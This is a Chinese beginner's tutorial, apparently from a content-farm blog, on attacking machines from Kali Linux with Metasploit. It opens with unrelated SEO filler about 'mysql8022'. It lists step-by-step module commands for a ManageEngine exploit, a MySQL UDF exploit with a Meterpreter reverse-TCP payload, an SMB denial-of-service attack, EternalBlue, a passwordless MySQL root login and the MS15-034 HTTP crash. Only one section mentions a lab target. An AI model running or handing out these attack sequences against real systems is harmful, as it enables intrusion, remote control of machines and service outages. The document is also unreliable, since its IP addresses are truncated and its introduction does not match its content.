龙空技术网

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

Kali与编程 763

前言:

现在大家对“mysql8022怎么使用”大体比较着重,姐妹们都需要学习一些“mysql8022怎么使用”的相关文章。那么小编在网络上网罗了一些关于“mysql8022怎么使用””的相关文章,希望姐妹们能喜欢,大家一起来学习一下吧!

1、攻击windows服务器漏洞

用nmap对网段进行扫描nmap -sP 192.168. 在进行IP扫描

发现Windows服务器漏洞

步骤:

msfconsole---进入渗透模块

search manageengine-------搜索渗透模块

search reverse_http---------搜索http渗透模块

use exploit/windows/http/manageeine_connectionid_write--------使用该渗透模块

set rhosts 192.168.

set rport 8022

set LpORT 8080

run -----------------设置攻击目标地址,攻击目标端口,回连的端口号:

2、MYSQL数据库漏洞

nmap 192.168.-----扫描端口漏洞

步骤:

msfconsole-------进入渗透模式

search mysql-------扫描数据库渗透版本

use exploit/multi/mysql/mysql_udf_payload----------使用该渗透版本进行渗透

show options

set rhosts 192.168.--------设置攻击端口号

set payload windows/x64/meterpreter/reverse_tcp--------选择该渗透方式进行攻击

run

3、拒绝服务攻击漏洞:

使用nmap 192.168. 对端口号进行扫描发现漏洞

步骤:

msfconsole-------进入渗透模式

search dos/smb/smb-------搜索渗透版本

use auxiliary/dos/smb/smb_loris-------使用该渗透版本进行攻击

show options--------

set rhosts 192.168.--------设置攻击端口号

run-----渗透

4.永恒之蓝漏洞复现

漏洞描述:

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

影响版本:

目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

复现环境:

攻击机:Kali2020.3(IP:192.168.88.143)

靶机:Metasploitable3Win2k8 (IP:192.168.88.140)

复现过程:

用nmap执行C段扫描

2、打开MSF

在终端输入如下命令打开MSF终端:

搜索ms17_010模块

这里可以得到几个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

执行扫描模块

执行ms17_010攻击模块

5.MySQL弱密码登录:

1、在kali上执行mysql –h 192.168.26.123 –u root

2、登录成功,进入MySQL系统

3、测试效果:

6.http(ms15_034漏洞)

进入msf模块

查看要设置的东西show options

设置攻击ip

攻击前

攻击后,我的是蓝屏1秒后,跳转到立即重启界面

ssh测试

开启端口转发

查看情况

在kali上尝试连接(rdesktop IP)

标签: #mysql8022怎么使用